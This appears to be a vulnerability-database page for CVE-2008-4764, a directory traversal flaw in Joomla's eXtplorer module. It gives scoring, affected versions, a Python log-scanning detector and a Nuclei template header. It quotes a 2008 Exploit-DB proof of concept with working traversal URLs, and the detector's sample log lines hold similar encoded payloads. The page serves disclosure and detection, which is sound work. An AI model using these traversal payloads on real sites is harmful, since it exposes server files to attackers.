CVE-2008-4764
published 2008-10-28
CVE-2008-4764: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via…
Priority P3 40 · medium 5 · CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 16.50% (96.6th percentile)
Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| extplorer | com_extplorer | <= 2.0.0 | — |
No detection rules found.
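As an added example (not taken from this page's feeds or from the eXtplorer project), the following Python check flags access-log requests that match the pattern in the description: `option=com_extplorer`, `action=show_error`, and a `..` segment in `dir`, including percent-encoded and double-encoded forms. The combined log format, the decode-round limit and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Client IP and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap double/triple encoding


def fully_decode(value: str) -> str:
    """Percent-decode repeatedly so %252e%252e is seen as '..'."""
    for _ in range(MAX_DECODE_ROUNDS):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value


def is_extplorer_traversal(target: str) -> bool:
    """True if the request matches the CVE-2008-4764 pattern."""
    # PHP keeps the last duplicate query parameter, so inspect v[-1].
    q = {k: fully_decode(v[-1]) for k, v in parse_qs(urlsplit(target).query).items()}
    if (q.get("option", "").lower(), q.get("action", "").lower()) != ("com_extplorer", "show_error"):
        return False
    # Flag a '..' path segment with either slash style; 'my..notes' is not one.
    return ".." in re.split(r"[\\/]+", q.get("dir", ""))


def scan(lines):
    """Return (client_ip, request_target) for each suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and is_extplorer_traversal(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Apr/2008:10:00:00 +0000] "GET /joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2Fetc HTTP/1.1" 200 512',
    '192.0.2.11 - - [13/Apr/2008:10:00:05 +0000] "GET /joomla/index.php?option=com_extplorer&action=show_error&dir=%252e%252e%252fetc HTTP/1.1" 200 512',
    '192.0.2.12 - - [13/Apr/2008:10:00:09 +0000] "GET /joomla/index.php?option=com_extplorer&action=list&dir=images HTTP/1.1" 200 900',
    '192.0.2.13 - - [13/Apr/2008:10:00:12 +0000] "GET /joomla/index.php?option=com_extplorer&action=show_error&dir=my..notes HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, target in scan(SAMPLE_LOG):
        print(ip, target)
```

A hit only shows that a matching request was made; the response status and size in the same log line help judge whether the installed version actually served file contents.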
Exploit-DB
Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal
exploitdb·2008-04-13
---
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
= Author : HouSSaMix
= Script : Joomla and Mambo Component com_extplorer
= version : target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[directory]
example :
site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
= greetz : V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers
# milw0rm.com [2008-04-13]
Nuclei
Joomla! <=2.0.0 RC2 - Local File Inclusion
nuclei·CVSS 5.0
Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
Template:
```yaml
id: CVE-2008-4764
info:
  name: Joomla! <=2.0.0 RC2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
  impact: |
    Attackers can read sensitive files on the server, potentially leading to information disclosure.
  remediation: |
    Upgrade Joomla! to a version higher than 2.0.0
```
Published: 2008-10-28